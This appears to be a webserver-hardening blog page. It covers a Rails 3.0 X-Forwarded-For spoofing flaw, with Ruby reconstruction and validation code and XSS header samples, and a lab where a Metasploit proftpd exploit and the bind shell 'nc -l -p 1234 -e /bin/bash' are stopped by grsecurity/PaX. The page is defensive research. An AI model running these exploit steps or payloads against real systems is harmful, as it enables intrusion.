webservsec<br />
<br />
<b>Webserver Attack-Countermeasures - Organisational Perspective</b> (2015-11-10)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVved6m9or9F2FklrjuU6Rk7rbIlwhCMb54q7MPd33uaDg7LFDk4YXzX7tucdis4le-7bhOFm-S2pnJxKXY1LOfhaUoave1H6XpxYmK-U0pCaIEnuKyl9iP4iFcrEhbq4c8I7WkYLIRmP/s1600/ipep-counter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvVved6m9or9F2FklrjuU6Rk7rbIlwhCMb54q7MPd33uaDg7LFDk4YXzX7tucdis4le-7bhOFm-S2pnJxKXY1LOfhaUoave1H6XpxYmK-U0pCaIEnuKyl9iP4iFcrEhbq4c8I7WkYLIRmP/s1600/ipep-counter.png" /></a></div>
<b>Incident Response with Server- and Config-Management</b> (2011-04-03)<br />
<br />
Hi,<br />
I am working on finding best practices in webserver security (for my servers).<br />
As this is a work in progress, I would really appreciate any criticism, hints, ...<br />
<br />
sample server:<br />
grsecurity-patched (hardened) kernel with an active least-privilege policy (RBAC)<br />
Apache with mod_rails (Phusion Passenger), one system user per web app<br />
logs shipped to an external server running Splunk<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpfA6_C2xUes1bLiYCTypX-dDZe8Mpmwdl9Qkq7m2i2jJXL2PZ7AaY7JukOWNQz90TFoZolOAvSjTb2MuR-K8bWlZhyANHalCnDhVKwaGQqWHOYt0D8i1upqoeEjO9gL_fVkaHgjHtIq9J/s1600/incident-response.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpfA6_C2xUes1bLiYCTypX-dDZe8Mpmwdl9Qkq7m2i2jJXL2PZ7AaY7JukOWNQz90TFoZolOAvSjTb2MuR-K8bWlZhyANHalCnDhVKwaGQqWHOYt0D8i1upqoeEjO9gL_fVkaHgjHtIq9J/s1600/incident-response.png" /></a></div>br J<br />
<br />
<b>Ruby on Rails Vulnerability</b> (2011-02-15)<br />
<br />
Rails 3.0.5 doesn't validate the X-Forwarded-For header <u>sent by clients whose REMOTE_ADDR is in a private range such as 192.168.0.0/16 (the "class C" private block)</u>; see TRUSTED_PROXIES in the screenshot below. A REMOTE_ADDR matching that pattern is discarded as a trusted proxy, and whatever the client put into X-Forwarded-For is then used verbatim. So this attack can also work with a load balancer in front of the Mongrel or Unicorn instances: the private address the balancer appends is discarded in the same way, leaving the attacker-supplied value.<br />
<br />
This affects the security of internal web servers running Rails web apps (intranet servers, ...).<br />
<br />
<b>affected</b>: request.remote_ip<br />
<br />
rails/actionpack/lib/action_dispatch/middleware/remote_ip.rb method: to_s<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsDM6CFYhGVhWfvDOvOn56OuIQk_OSirndr4_Fy4DV5viAuqh9r2IzRMplarjLroWRafIlOLW1XqvfIAUzk1XNvxz_7ZhwHgNMf060SxCsrpzGsqX2SWCC4MkE6CzvzTYKt4MIR30XmRRs/s1600/rails_remoteip.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsDM6CFYhGVhWfvDOvOn56OuIQk_OSirndr4_Fy4DV5viAuqh9r2IzRMplarjLroWRafIlOLW1XqvfIAUzk1XNvxz_7ZhwHgNMf060SxCsrpzGsqX2SWCC4MkE6CzvzTYKt4MIR30XmRRs/s1600/rails_remoteip.jpg" /></a></div>rails/actionpack/lib/action_dispatch/http/request.rb<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4es6lfh0e_O2Z33sTRbD2YOILlfsf524B4zIWmIEoyfzh1JhhcpWZh4GrTeB1gs6i6MXR26jDs3eoPuI_OdfkM91q7un4sAeTpaj_EMEUuJzsnUE1LX-uYE1Vj4khhsxo5FQ_RsFGlcl6/s1600/rails_trustedproxies.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4es6lfh0e_O2Z33sTRbD2YOILlfsf524B4zIWmIEoyfzh1JhhcpWZh4GrTeB1gs6i6MXR26jDs3eoPuI_OdfkM91q7un4sAeTpaj_EMEUuJzsnUE1LX-uYE1Vj4khhsxo5FQ_RsFGlcl6/s1600/rails_trustedproxies.png" /></a></div><br />
<br />
<b>possible attacks (on intranet webapps)</b>:<br />
x IP spoofing<br />
x log file injection<br />
-- IP spoofing (fake source addresses in the logs)<br />
-- back-dating entries (hiding activity)<br />
-- binary injection to confuse analysis tools<br />
<br />
if request.remote_ip is used in an insecure manner:<br />
- persistent XSS<br />
- SQL injection (if request.remote_ip is interpolated into a SQL query)<br />
...<br />
(I would have trusted request.remote_ip)<br />
<br />
<b>quick fix</b>:<br />
check that "request.remote_ip" really is an IP address before you use it (in logs, views or SQL)<br />
<br />
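The lookup and the quick fix side by side, as an added example that is not part of the original post or of Rails itself. The first function is a simplified reconstruction of how the Rails 3.0 RemoteIp middleware derives request.remote_ip (the Client-IP spoofing check is left out, and the private-range pattern is written from memory, so treat it as an assumption); the Rack environments at the bottom are constructed, not captured from a server:

```ruby
require 'ipaddr'

# Added example, not Rails source: a simplified reconstruction of how the
# Rails 3.0 RemoteIp middleware picks request.remote_ip. REMOTE_ADDR values
# matching the trusted-proxy pattern are thrown away, after which whatever
# the client put into X-Forwarded-For is returned unchecked.
# The pattern is an assumption (private ranges + localhost, as in Rails 3.x).
TRUSTED_PROXIES = /(^127\.0\.0\.1$|^(10|172\.(1[6-9]|2[0-9]|30|31)|192\.168)\.)/i

def rails30_remote_ip(env)
  remote_addrs = env['REMOTE_ADDR'].to_s.split(/[,\s]+/).reject { |a| a =~ TRUSTED_PROXIES }
  return remote_addrs.first if remote_addrs.any?

  # Socket peer was "trusted", so the forwarded list decides; only entries
  # matching the proxy pattern are dropped, nothing else is validated.
  forwarded = env['HTTP_X_FORWARDED_FOR'].to_s.strip.split(/[,\s]+/)
  forwarded.reject { |ip| ip =~ TRUSTED_PROXIES }.last || env['REMOTE_ADDR']
end

# Strict check for a bare IPv4/IPv6 literal. IPAddr alone would also accept
# "1.2.3.4/24", so CIDR notation is rejected explicitly.
def ip_literal?(str)
  return false if str.nil? || str.empty? || str.include?('/')
  IPAddr.new(str)
  true
rescue ArgumentError # IPAddr::InvalidAddressError is an ArgumentError
  false
end

# The post's quick fix: use the derived value only if it really is an IP
# address, otherwise fall back to the socket peer (REMOTE_ADDR). Behind a
# balancer that fallback is the balancer's address, not the client's.
def validated_remote_ip(env)
  candidate = rails30_remote_ip(env)
  ip_literal?(candidate) ? candidate : env['REMOTE_ADDR']
end

# Constructed Rack environments for the three cases discussed in the post.
INTRANET_DIRECT = { 'REMOTE_ADDR' => '192.168.1.50',
                    'HTTP_X_FORWARDED_FOR' => '<script>alert(1)</script>' }
INTRANET_VIA_LB = { 'REMOTE_ADDR' => '10.0.0.2',
                    'HTTP_X_FORWARDED_FOR' => '<script>alert(1)</script>, 192.168.1.50' }
# Public client behind the same balancer; header carries a terminal escape.
INTERNET_VIA_LB = { 'REMOTE_ADDR' => '10.0.0.2',
                    'HTTP_X_FORWARDED_FOR' => "\e[2J, 203.0.113.5" }

if __FILE__ == $0
  [INTRANET_DIRECT, INTRANET_VIA_LB, INTERNET_VIA_LB].each do |env|
    puts "unvalidated: #{rails30_remote_ip(env).inspect}  validated: #{validated_remote_ip(env).inspect}"
  end
end
```

The three constructed requests show why the post scopes this to intranet apps: an intranet client, directly or through the balancer, gets its header value back unchanged, whereas a public client behind the balancer gets the balancer-appended public address. The validated variant falls back to REMOTE_ADDR, which behind a balancer is the balancer rather than the client; that is fine for keeping logs clean, but an application that needs the real client address should trust only the balancer's address as a proxy instead of whole private ranges.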
<b>proof-of-concept</b>:<br />
1.<br />
<span class="Apple-style-span" style="font-size: large;"><a href="https://gist.github.com/868268">https://gist.github.com/868268</a></span><br />
<br />
2.<br />
<br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">The screencast shows a PoC with the Tamper Data Firefox add-on:</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">persistent XSS with Devise, IP spoofing, ...</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><a href="http://www.screencast.com/users/banditj/folders/Jing/media/9025e6c3-a0fd-46d8-b1ef-ce2b01751f7c"><span class="Apple-style-span" style="font-size: large;">http://www.screencast.com/users/banditj/folders/Jing/media/9025e6c3-a0fd-46d8-b1ef-ce2b01751f7c</span></a></div><br />
<br />
You can leave anonymous comments.<br />
<br />
<a href="http://www.jimmybandit.com/">http://www.jimmybandit.com</a><br />
<br />
<b>grsecurity vs proftpd-exploit</b> (2011-01-31)<br />
<br />
Victim: Debian 6.0 with proftpd 1.3.3a<br />
Attacker: BackTrack 4 RC2 - Metasploit 3.6<br />
<br />
use exploit/linux/ftp/proftp_telnet_iac<br />
set TARGET 2<br />
set PAYLOAD ...<br />
<br />
The shell payloads of Metasploit didn't work, but I could execute a command:<br />
--> nc -l -p 1234 -e /bin/bash<br />
which listens on port 1234 and gives you a bash shell on connect.<br />
<div><br />
</div><div>The system got compromised. So now with grsecurity:</div><div>I used the tutorial from <a href="http://xorl.wordpress.com/2009/02/02/how-to-grsec-debian-262710-grsec/">http://xorl.wordpress.com/2009/02/02/how-to-grsec-debian-262710-grsec/</a></div><div>to patch the latest kernel, in this case</div><div>Linux debian 2.6.32.28</div><div><br />
</div><div>At compilation I got an error, something with "lguest".</div><div>I found an (easy) workaround at</div><div><a href="http://masetio.web.id/2010/03/compile-kernel-error-lguest-c3718-error-zlib-h-no-such-file-or-directory/">http://masetio.web.id/2010/03/compile-kernel-error-lguest-c3718-error-zlib-h-no-such-file-or-directory/</a></div><div><br />
</div><div>I tried again to exploit proftpd and it didn't work.</div><div><b>PaX alerted me and shut down proftpd.</b></div><div><br />
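An added example (not from this post, and not part of grsecurity or Splunk) that covers two points at once: the external log server in the sample server of the Incident Response post above, and the PaX kill seen here. It parses PaX "terminating task" messages out of a kernel log and raises an alert when the same binary is killed repeatedly. The log lines are constructed to follow the PaX report format as I know it (PAX: terminating task: &lt;path&gt;(&lt;comm&gt;):&lt;pid&gt;, uid/euid: &lt;uid&gt;/&lt;euid&gt;, ...) and are not taken from the page; the PID, PC and SP values are made up.

```ruby
# Added example (not from the original post, grsecurity or Splunk): turn PaX
# "terminating task" kernel messages into alert records, the kind of rule
# that belongs on the external log host. The sample below is constructed,
# following the PaX report format; PIDs, PC and SP values are invented.
SAMPLE_KERNEL_LOG = <<~LOG
  Jan 31 22:41:07 debian kernel: [ 1842.120394] PAX: terminating task: /usr/sbin/proftpd(proftpd):2210, uid/euid: 0/0, PC: b7f3a1c0, SP: bfb2d8a0
  Jan 31 22:41:07 debian kernel: [ 1842.120401] PAX: bytes at PC: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
  Jan 31 22:41:09 debian proftpd[2210]: 192.168.56.101 (192.168.56.1[192.168.56.1]) - FTP session closed.
  Jan 31 22:43:15 debian kernel: [ 1970.003311] PAX: terminating task: /usr/sbin/proftpd(proftpd):2231, uid/euid: 0/0, PC: b7f3a1c0, SP: bfb2d8a0
LOG

# Matches only the kill line itself; the "bytes at PC" dump and the
# daemon's own session messages are ignored.
PAX_KILL = %r{PAX: terminating task: (?<path>/\S+?)\((?<comm>[^)]*)\):(?<pid>\d+), uid/euid: (?<uid>\d+)/(?<euid>\d+)}

PaxKill = Struct.new(:path, :comm, :pid, :uid, :euid)

# One record per killed task, in log order.
def pax_kills(log)
  log.each_line.map do |line|
    m = PAX_KILL.match(line)
    m && PaxKill.new(m[:path], m[:comm], m[:pid].to_i, m[:uid].to_i, m[:euid].to_i)
  end.compact
end

# Alert per binary once it has been killed `threshold` times: a single kill
# may be a bug, repeated kills of a network daemon look like exploit attempts.
# as_root flags kills of processes whose effective uid was 0.
def pax_alerts(log, threshold: 2)
  pax_kills(log).group_by(&:path).select { |_, kills| kills.size >= threshold }.map do |path, kills|
    { path: path, count: kills.size, as_root: kills.any? { |k| k.euid.zero? }, pids: kills.map(&:pid) }
  end
end

if __FILE__ == $0
  pax_alerts(SAMPLE_KERNEL_LOG).each do |a|
    puts "ALERT #{a[:path]} killed #{a[:count]}x (root: #{a[:as_root]}) pids=#{a[:pids].join(',')}"
  end
end
```

On a real deployment the kernel ring buffer would be forwarded over syslog to the log server and this rule would run there, so a post-exploitation attacker on the victim cannot quietly remove the evidence; the threshold is deliberately low because a respawning daemon like proftpd gives an attacker unlimited retries.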
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO8UzQzzvsKZAv1YTUafichpMnuYVnF_9_odn_6wn29Sb_78Gpm9EJTXHWan6I8NM4P2a7ZA3XJljr29zoEBSAKc5sP6rWOXoCpTdYwXOO0UI1TNOv466QN2x93XfE9YJ3vEoJw3Ta3Ur_/s1600/grsecurity.vs.proftpd-exploit.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO8UzQzzvsKZAv1YTUafichpMnuYVnF_9_odn_6wn29Sb_78Gpm9EJTXHWan6I8NM4P2a7ZA3XJljr29zoEBSAKc5sP6rWOXoCpTdYwXOO0UI1TNOv466QN2x93XfE9YJ3vEoJw3Ta3Ur_/s1600/grsecurity.vs.proftpd-exploit.png" /></a></div><div><br />
</div><div class="separator" style="clear: both; text-align: center;">Here is the video:</div><div class="separator" style="clear: both; text-align: center;"><a href="http://www.jimmybandit.com/grsecurity.vs.proftpd.swf">http://www.jimmybandit.com/grsecurity.vs.proftpd.swf</a></div><div><br />
</div><br />
<b>Webserver Attack-Flow</b> (2010-11-10)<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAYeDukWUPMomy-cPgMIrT4LlBJ9ZAInIhsF75yVGh6Q553IdvP4ko-enL-rabWqPgfQCIDy-u8d1cUe_4YJWzaGJNwrs02QaQEa31iAeqFyY8T_tuPoVveB63BsXNYzuqowu7UmUk8zPE/s1600/attack-flussdiagramm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAYeDukWUPMomy-cPgMIrT4LlBJ9ZAInIhsF75yVGh6Q553IdvP4ko-enL-rabWqPgfQCIDy-u8d1cUe_4YJWzaGJNwrs02QaQEa31iAeqFyY8T_tuPoVveB63BsXNYzuqowu7UmUk8zPE/s1600/attack-flussdiagramm.png" /></a></div><br />
<b>Threats</b> (2010-10-06)<div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM7dtlpoUgXZ11NiqdK_r7GFT5box-YPTuQjAASFCIXDPHEzKRhSwIrXyhMjUT3IBHW9MmlZDU8n9CJgsOrMJSd_Q8fmtduJTZjqb6uBHSjq9vG72pydBrRh8GjQnVS65VceTLi-J5G0Qf/s1600/web-vulns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhM7dtlpoUgXZ11NiqdK_r7GFT5box-YPTuQjAASFCIXDPHEzKRhSwIrXyhMjUT3IBHW9MmlZDU8n9CJgsOrMJSd_Q8fmtduJTZjqb6uBHSjq9vG72pydBrRh8GjQnVS65VceTLi-J5G0Qf/s1600/web-vulns.png" /></a></div><br />
</div><br />
<b>Countermeasures</b> (2010-10-05)<br />
image removed - hire me :-)<div class="separator" style="clear: both; text-align: center;">
</div>